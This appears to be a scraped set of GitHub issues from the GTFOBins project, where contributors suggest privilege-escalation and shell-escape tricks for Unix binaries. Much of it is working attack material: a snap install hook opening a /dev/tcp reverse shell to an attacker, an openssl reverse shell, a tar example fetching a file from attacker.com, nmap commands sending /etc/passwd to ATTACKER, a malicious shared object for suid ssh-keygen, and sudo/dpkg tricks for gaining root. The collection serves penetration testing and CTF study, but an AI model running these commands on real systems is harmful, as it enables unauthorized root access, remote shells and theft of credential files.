gtfobins / gtfobins.github.io Goto Github PK

Reading text file in NodeJS:

require('fs').readFile('/path/to/file', {encoding: 'utf-8'}, function(err, data) {
        console.log(data);
});

the option --use-askpass doesn't work anymore in the newer version of wget

we can use a solution described here:
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-wget-privilege-escalation/#4.-transfer-the-content-of-the-shadow-file

that is still present in wget make use of file upload and file download sections

If there is instead a better option that do not waste shadow files should be great

It's the same if it's suid, but it's not by default anywhere I can think of.

sudo ispell <file with misspelled words according to dictionary>
!sh

Caveat, if not specified, It ships with English dictionaries (I believe both GB and US), but various distributions may package it with appropriate dictionaries if the system is configured correctly.
I don't come across it as much as aspell, but I come across it plenty.

https://www.cs.hmc.edu/~geoff/ispell.html
https://www.gnu.org/software/ispell/

Hello, the given File Read command didn't really work for me but I found out another way to read the file
genisoimage -sort "$LFILE"

Currently only the CAP_SETUID capability is supported. I propose we expand the category to support other exploitable capability types, such as CAP_SYS_PTRACE. As long as the capability provides some sort of shell, arb read, arb write etc primitive, it should be valid to go in GTFOBins.

Hi

Before submitting a PR I would like to hear your opinion.

Would it make sense to create a new function for wildcard / parameter injection possibilities?

This function would address all binaries which could be used to execute a function via a command line argument.

A well-known example is the tar command and the arguments --checkpoint-action=exec="chmod +s `which dash`" --checkpoint=1 as e.g. documented here: https://materials.rangeforce.com/tutorial/2019/11/08/Linux-PrivEsc-Wildcard/

I'm aware that this command execution method is already documented in GTFOBins, but it cannot be identified as wildcard or parameter injection. A new category would make sense for me to quickly identify binaries which can be abused for privesc if one or more parameters can be controlled.

What do you think?

THX

Currently all file writes are kept in the single category File Write.

However not all file writes are equal. Some, such as cp, dd, and mv give you full control over the content of the file to be written, which is a powerful primitive and highly exploitable.

Whereas some, such as nmap #153, by the author's own definition "I've yet to come up with a way to overwrite the contents of the system file according to what we want,"

I propose the creation of a Limited File Write category, that allows us to more effectively categorize file writes into bins that either

• let you control the full content (File Write),
• vs bins that let you control partial content (Limited or Partial File Write).

I'd be happy to help categorize should this go ahead.

Note that in bash (but not in Bourne shell) you can use <<< (here-string) to put a string in the standard input, instead of echo and pipe. So a file-write operation with tee would be:

./tee -a "$LFILE" <<< 'data'

instead of

echo data | ./tee -a "$LFILE"

This is not specific to tee, but relevant to all uses of echo in this repo. Not sure where is the correct place to mention this.

For the following binary, https://gtfobins.github.io/gtfobins/ssh-keygen/, Instructions stated on the document is not enough. I would like to add more info like generating a valid shared object file. How can I add it? If I add it to the description, then it may overwrite default description. Otherwise I have to add it as function But currently I don't see any suitable function for it. Can you add a suitable function for that or Can you guide me if it's possible add examples?

If author doesn't respond or anyone looking for the answer to ssh-keygen binary, then this is how you can generate a valid shared object file. This is much useful when ssh-keygen binary has suid bit:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int C_GetFunctionList(){
    setuid(geteuid());
    system("id"); //Your command
    printf("\n"); //New line is important
    return 1;
}

Save above file as lib.c and compile using below command:

gcc -shared -o lib.so -fPIC lib.c

Then execute:

ssh-keygen -D ./lib.so

Some versions of Snap will not try to install a package with a single character as its name. Snap's GTFOBin can be made more widely usable by changing fpm -n x -s dir -t snap -a all meta to something like fpm -n test -s dir -t snap -a all meta and likewise sudo snap install x_1.0_all.snap --dangerous --devmode to sudo snap install test_1.0_all.snap --dangerous --devmode.

Without this change, snap will error out with error: cannot read snap file: invalid snap name: "x" and not execute the given command.

Hi,

Would you be interested in a way to exploit this kind of sudo rules?

%grp ALL=(ALL:ALL) /usr/bin/apt-get install *
%grp ALL=(ALL:ALL) /usr/bin/apt-get remove *

I see you already have it for apt-get but sometimes sysadmins will only allow sub commands of apt, thinking that they are safe this way.

Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.

https://inventory.rawsec.ml/resources.html#GTFOBins

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

• Open source: Every information is available and up to date. If an information is missing or deprecated, you are invited to (help us).
• Practical: Content is categorized and table formatted, allowing to search, browse, sort and filter.
• Fast: Using static and client side technologies resulting in fast browsing.
• Rich tables: search, sort, browse, filter, clear
• Fancy informational popups
• Badges / Shields
• Static API
• Twitter bot

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why?

• Specialized websites: Some websites are referencing tools but additional information is not available or browsable. Make additional searches take time.
• Curated lists: Curated lists are not very exhaustive, up to date or browsable and are very topic related.
• Search engines: Search engines sometimes does find nothing, some tools or resources are too unknown or non-referenced. These is where crowdsourcing is better than robots.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool, more and more people are using the Rawsec's CyberSecurity Inventory, this helps them find what they need.

Badges

The badge shows to your community that your are inventoried. This also shows you care about your project and want it growing, that your tool is not an abandonware.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.

Want to thank us?

If you want to thank us, you can help make the project better known by tweeting about it! For example:

So what?

That's all, this message is just to notify you if you care.

dpkg -i -o DPkg::Pre-Install-Pkgs::="usermod -a -G sudo $(whoami)" any_package.deb

Just came across this technique on a Hack the box machine. I guess it would be good to have it as a technique GTFOBins.
Some sources: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

Hi,

I just want to know if I understand the information here correctly.
Supposedly for cat, a File read means that it will read data outside a restricted file system.
I tried to run this in Ubuntu.

LFILE=/root/my_file.txt
cat "$LFILE"

However it still gave me "Permission denied"
Is there a limitation for this to work?

Thanks.

i uploaded you code on hacksudo.github.io but unable to get search result issue is

Hey! Could we colorize the vuln tags, so that it is easy to see the most dangerous programs at a glance?

Hello!
I noticed in https://gtfobins.github.io, there isn't anything mentioned for ways to GTFO of snap ... "i.e. snap install".
There was a recent CTF machine where this was a way to get root taking advantage of the sudo permissions:
(root) NOPASSWD: /usr/bin/snap install *

Here are some references on how to exploit this:
https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html
https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py

Here is a script I wrote using the following references and updated to reflect my environment:
Note: My firewall was affecting the build process, so I temporarily disable it in this script.
./buildSnap.sh

## Install necessary tools
sudo snap install snapcraft --classic

## Disable firewall
sudo ufw disable

## Make an empty directory to work with
cd ~/Documents
mkdir revshell_snap
cd revshell_snap

## Initialize the directory as a snap project
snapcraft init

## Set up the install hook
mkdir snap/hooks
touch snap/hooks/install
chmod a+x snap/hooks/install

## Write the script we want to execute as root
cat > snap/hooks/install << "EOF"
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/attackerip/attackerport 0>&1'
EOF

## Configure the snap yaml file
cat > snap/snapcraft.yaml << "EOF"
name: revshell
base: core
version: '1.0' 
summary: Runs exploit bash script when installed
description: Runs exploit bash script when installed
grade: devel
confinement: devmode
parts:
  my-part:
    plugin: nil
EOF

## Build the snap
snapcraft

## Re-enable firewall
sudo ufw enable

## Move
mv revshell_1.0_amd64.snap ../revshell.snap

Then you would install the snap and it would run the install hook script when it installs ...
sudo snap install revshell.snap --dangerous --devmode

Let me know if this is something worth adding the GTFO repository going forward!
Thanks!

If the wireshark gui loads the Lua plugin then it is possible to execute any Lua code.

Tools -> Lua -> Evaluate:

os.execute("xterm")

While doing the challenges for the first module of pwn.college I found a way to read files with an SUID version of gcc.

Following the format of other examples, this is how to reproduce:

sudo sh -c 'cp $(which gcc) .; chmod +s ./gcc'

LFILE=file_to_read
./gcc -x c "$LFILE"

Assuming the privileged file is not valid C code, much if not all of its lines should be output within syntax error messages.

Is this the kind of example that would be worth adding?

https://gtfobins.github.io/gtfobins/genisoimage/

genisoimage -sort /flag

Original command:
rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null

In "sh 1>&2 0>&2", the - p parameter inheritance permission is missing after the command sh; Causing the failure of power raising;

Modified command:
rsync -e 'sh -p -c "sh -p 0<&2 1>&2"' 127.0.0.1:/dev/null

First of all thanks for this interesting project.
I've already made a post on (sorry for the cross-post)
https://security.stackexchange.com/questions/197900/command-line-tools-exploitable-on-linux
But I've decided to post here too because I'm interested in your opinion.
As said in the post above, why do you consider mv (is only an example) as a dangerous command line tool?
Ok, I can write in a un-permitted file if the SUID bit is set, but:

1. Every file with the SUID bit can be potentially dangerous
2. I've never seen mv with SUID bit set in any distribution

Why do you have "blacklisted" this command?
I've the same doubts on other commands.

Linux is saved to a file after looking at suid and guid on the computer.
In this way, the following captured data can be compared with two files.

curl https://gtfobins.github.io |grep '<li><a href="/gtfobins/'| grep "#suid"| cut -d / -f 3

I have this script that works this way. But it doesn't work very well.
https://github.com/ihack4falafel/OSCP/blob/master/BASH/SUIDChecker.sh

Do you have any idea about it?
Have a good day.

Good day,

https://manpages.debian.org/stretch/procps/top.1.en.html#6c._ADDING_INSPECT_Entries
https://gitlab.com/procps-ng/procps/blob/master/top/top.c#L2996

It's a bit of a pain, since it requires an arbitrary append to ~/.toprc to add a custom inspect entry and it's really picky about this file format. Example, choose W to write a default ~/.toprc, then append:

...
pipe^IRun arbitrary code as root^Iid

Then run top and choose Y to inspect a process, and chose your custom inspect entry

Inspection View at pid: 3986, running myprocess.  Locating:  N/A
Use:  left/right/up/down/etc to navigate the output; 'L'/'&' to locate/next.
Or:   <Enter> to select another; 'q' or <Esc> to end !
Run arbitrary code as root: 1-1 lines,   1-121 columns, 77 bytes read
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

Is this worth writing up in a pull request? It might be a while before I get to it. If someone else wants the glory, it's cool with me. 😁

This is working fine
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0,1,2]})'

It would be interesting to add a second line assigning permissions to the user you would like to escalate. Since NPM needs write permission on the folder you create.

TF=$(mktemp -d)
chmod 777 $TF
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo -u serv-manage npm -C /tmp/tmp.22ePTsET6U --unsafe-perm i

Thanks.

hey there. i was doing a ctf and didn't see cap_chown related capability in Ruby.
thought it would be great to add following to Ruby CAPABILITIES section.

echo "File.chown(id,nil,'/file/to/chown')" > chown.rb
chmod +x chown.rb
ruby chown.rb

-example:

echo "File.chown(1003,nil,'/etc/shadow') > chown.rb

From fallofsudo:

sudo dmesg --human
!/bin/bash

When: (ALL, !root) /bin/bash

sudo -u#-1 /bin/bash to get root

Is there a license for using this?
I have an idea for a project and want to make sure im not going to be breaking any license.

The reason I ask is because of this tool repository that I created a while back: syscaller

There are a lot of things listed here that are examples of "use of privileges results in use of privileges". As an example, your listing for cat includes:

File read -
"It reads data from files," - It sure does!
"it may be used to do privileged reads" - Iff the parent process is privileged, in which case, the cat (no pun intended) is out of the bag.
"or disclose files outside a restricted file system." - What does that even mean?

This applies to all instances of "File read", not just cat.

SUID -
"It runs with the SUID bit set" - Not on my box. Not any anybody's box (within experimental error).
"This example creates a local SUID copy of the binary and runs it to maintain elevated privileges." - If you have the capability to add SUID to cat, you don't need to add SUID to cat.

This applies to all instances of "SUID", not just cat.

Sudo -
"It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo." - That's literally what sudo is designed to do. Running sudo results in elevated privileges, by design.

This applies to all instances of "Sudo", not just cat.

If ldconfig binary is suid, it would be possible to change library path loaded by other binaries in order to hijack libs.

I don't know how to create a good example to add it to the list but I think it should be added.

Here are 2 different examples:

• https://www.boiteaklou.fr/Abusing-Shared-Libraries.html#3-setuid-bit-on-ldconfig
• https://0xrick.github.io/hack-the-box/dab/#hijacking-dynamically-linked-shared-object-library-and-getting-root

Thanks

--to-command=COMMAND
	      pipe extracted files to another program

For example:

echo -e '#!/bin/bash\n\nwget http://attacker.com/malicious.elf' > script.sh
tar -cvf script.tar script.sh

sudo tar -xvf script.tar --to-command /bin/bash

Source: https://0xdf.gitlab.io/2018/10/20/htb-tartarsauce.html

Hi,

Not tested but should work.

From: https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/

Create a deb using fpm:
# fpm -s dir -t deb –name sploit –before-install BS_package/foo.sh BS_package/

Load our deb with dpkg
sudo dpkg -i exploit.deb

Have a nice day

I might be wrong, but I think this commit is accidental, and bash wasn't supposed to be removed.

83c2ba8

If thats the case, happy to send a PR.

I just recently used 7zr on Linux as a way of adding a python file to an archive and then extracting it into a root owned directory as an unprivileged user.

We should add this as another method when sudo privileges are set on 7zr.

screen -x root/root

Run it and youll be root if the binary is SUID

Specs

Terminal: termite V15
Ncat version: 7.80
OpenSSL version: OpenSSL 1.1.1e 17 Mar 2020
OS: Arch Linux
Kernel: 5.5.10.a-1-hardened

Issue

Hi guys!

I had a lot of issues with the OpenSSL reverse shell. Like disconnections, latency etc... I found out after some tests that the flag -no_ign_eof is causing issues when you upgrade your shell to a fully interactive tty.

Example with screens:

Attacker box:

ncat --ssl -lnvp 4444 or openssl s_server -quiet -cert /tmp/cert.pem -key /tmp/key.pem -port 4444

Victim box:

rm /tmp/s; mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect localhost:4444 > /tmp/s; rm /tmp/s

I then initiate the procedure to upgrade to a fully interactive tty shell

SHELL=/bin/bash script -q /dev/null
CTRL+Z
stty raw -echo
fg
reset

Then at this point, if I do an uppercase "R": it crashes my reverse shell with the following information:

RENEGOTIATING
119157357475136:error:1420410A:SSL routines:SSL_renegotiate:wrong ssl version:ssl/ssl_lib.c:2127:

UPDATE: it's the same with a lowercase "k": it crashes but with the "KEYUPDATE" reason.

If I remove the -no_ign_eof, I do not have any problem with the reverse shell and I can do an uppercase "R" when upgrading my OpenSSL reverse shell without connection crash/disconnection.

My question is:

Is this argument really necessary? I did not encounter any problem while not using it tho it may need more testing. Are you able to reproduce this on your side?

Regards

Especially if it’s a CI-generated script.

I’m very curious about the various machines I use and whether they are vulnerable to non-privileged users running these commands.

Would love a pass/fail that takes a filename as a param for those tests that attempt to read files.

ssh, nc/ncat/socat/openssl, bash /dev/tcp redirects, et al can be used to forward ports to access more systems.

If you have a 3-machine ssh-chain, say A->B->C, where B->C is a forced ssh command, then unless the forced command includes -e none you can interact with this second client using ~~C (a tilde per ssh client in the chain) to add -L, -R, and -D forwards. It is common for servers with forced commands to block port forwarding, but easy to not know about the escape sequence which effectively re-enables them under this (rare) configuration.

Sorry for opening an issue and not doing a PR but I don't have lot of time, you will do it faster than me.
These new ways are from the FallofSudo project.

Here are some other tools:

• smbclient

Connect to a valid SMB or CIFS share:
sudo smbclient \\ip\share -U username
smb:> !/bin/bash

• mysql
  sudo mysql -e '\! /bin/bash'

• apt-get

sudo apt-get changelog bash
!/bin/bash

• apt (same as apt-get)
• mv
• cp
• chown
• chmod
• facter

Hello.
Sorry I have a not enough time for creating pull request.
I want to suggest a few tricks who helped me with exploting "https://bitbucket.org/xael/python-nmap/issues/51/security-issue-nmap-parameter-injection" without direct access to file system.

arbitrary file read

nc -nv -lp 80
nmap ATTACKER --script http-put --script-args http-put.url='/',http-put.file='/etc/passwd'

arbitrary file write

php -S 0.0.0.0:80 -t . router_with_directory_listing.php
nmap ATTACKER -sV --script http-fetch --script-args 'destination=/tmp/'

Seems like /usr/bin/bundle and /usr/bin/bundler are both installed with the bundler gem.

They were different once, but are now identical except for name:

rubygems/bundler@2894378